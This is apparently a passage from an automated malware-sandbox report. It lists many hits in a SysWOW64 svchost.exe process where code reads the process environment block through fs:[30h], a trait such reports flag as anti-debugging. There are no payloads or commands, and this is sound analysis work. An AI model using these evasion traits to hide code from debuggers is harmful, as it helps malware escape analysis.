            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h]2_2_02FD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC3CD mov eax, dword ptr fs:[00000030h]2_2_02FEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB63C0 mov eax, dword ptr fs:[00000030h]2_2_02FB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h]2_2_02F5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h]2_2_02F5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD437C mov eax, dword ptr fs:[00000030h]2_2_02FD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov ecx, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA352 mov eax, dword ptr fs:[00000030h]2_2_02FFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD8350 mov ecx, dword ptr fs:[00000030h]2_2_02FD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C310 mov ecx, dword ptr fs:[00000030h]2_2_02F2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50310 mov ecx, dword ptr fs:[00000030h]2_2_02F50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]2_2_02F2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F720F0 mov ecx, dword ptr fs:[00000030h]2_2_02F720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_02F2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F380E9 mov eax, dword ptr fs:[00000030h]2_2_02F380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB60E0 mov eax, dword ptr fs:[00000030h]2_2_02FB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB20DE mov eax, dword ptr fs:[00000030h]2_2_02FB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF60B8 mov eax, dword ptr fs:[00000030h]2_2_02FF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]2_2_02FF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC80A8 mov eax, dword ptr fs:[00000030h]2_2_02FC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3208A mov eax, dword ptr fs:[00000030h]2_2_02F3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5C073 mov eax, dword ptr fs:[00000030h]2_2_02F5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32050 mov eax, dword ptr fs:[00000030h]2_2_02F32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6050 mov eax, dword ptr fs:[00000030h]2_2_02FB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6030 mov eax, dword ptr fs:[00000030h]2_2_02FC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A020 mov eax, dword ptr fs:[00000030h]2_2_02F2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C020 mov eax, dword ptr fs:[00000030h]2_2_02F2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030061E5 mov eax, dword ptr fs:[00000030h]2_2_030061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4000 mov ecx, dword ptr fs:[00000030h]2_2_02FB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F601F8 mov eax, dword ptr fs:[00000030h]2_2_02F601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]2_2_02FF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]2_2_02FF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F70185 mov eax, dword ptr fs:[00000030h]2_2_02F70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]2_2_02FEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]2_2_02FEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]2_2_02FD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]2_2_02FD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C156 mov eax, dword ptr fs:[00000030h]2_2_02F2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC8158 mov eax, dword ptr fs:[00000030h]2_2_02FC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]2_2_02F36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]2_2_02F36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov ecx, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60124 mov eax, dword ptr fs:[00000030h]2_2_02F60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov ecx, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF0115 mov eax, dword ptr fs:[00000030h]2_2_02FF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]2_2_02FB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]2_2_02FB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_02F6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]2_2_02F6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F666B0 mov eax, dword ptr fs:[00000030h]2_2_02F666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]2_2_02F6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]2_2_02F34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]2_2_02F34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F62674 mov eax, dword ptr fs:[00000030h]2_2_02F62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]2_2_02FF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]2_2_02FF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]2_2_02F6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]2_2_02F6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4C640 mov eax, dword ptr fs:[00000030h]2_2_02F4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E627 mov eax, dword ptr fs:[00000030h]2_2_02F4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F66620 mov eax, dword ptr fs:[00000030h]2_2_02F66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68620 mov eax, dword ptr fs:[00000030h]2_2_02F68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3262C mov eax, dword ptr fs:[00000030h]2_2_02F3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72619 mov eax, dword ptr fs:[00000030h]2_2_02F72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE609 mov eax, dword ptr fs:[00000030h]2_2_02FAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]2_2_02F347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]2_2_02F347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]2_2_02FBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]2_2_02F3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB07C3 mov eax, dword ptr fs:[00000030h]2_2_02FB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F307AF mov eax, dword ptr fs:[00000030h]2_2_02F307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE47A0 mov eax, dword ptr fs:[00000030h]2_2_02FE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD678E mov eax, dword ptr fs:[00000030h]2_2_02FD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38770 mov eax, dword ptr fs:[00000030h]2_2_02F38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30750 mov eax, dword ptr fs:[00000030h]2_2_02F30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE75D mov eax, dword ptr fs:[00000030h]2_2_02FBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]2_2_02F72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]2_2_02F72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4755 mov eax, dword ptr fs:[00000030h]2_2_02FB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov esi, dword ptr fs:[00000030h]2_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]2_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]2_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]2_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov ecx, dword ptr fs:[00000030h]2_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]2_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAC730 mov eax, dword ptr fs:[00000030h]2_2_02FAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]2_2_02F6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]2_2_02F6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30710 mov eax, dword ptr fs:[00000030h]2_2_02F30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60710 mov eax, dword ptr fs:[00000030h]2_2_02F60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C700 mov eax, dword ptr fs:[00000030h]2_2_02F6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F304E5 mov ecx, dword ptr fs:[00000030h]2_2_02F304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F644B0 mov ecx, dword ptr fs:[00000030h]2_2_02F644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]2_2_02FBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F364AB mov eax, dword ptr fs:[00000030h]2_2_02F364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC460 mov ecx, dword ptr fs:[00000030h]2_2_02FBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2645D mov eax, dword ptr fs:[00000030h]2_2_02F2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5245A mov eax, dword ptr fs:[00000030h]2_2_02F5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
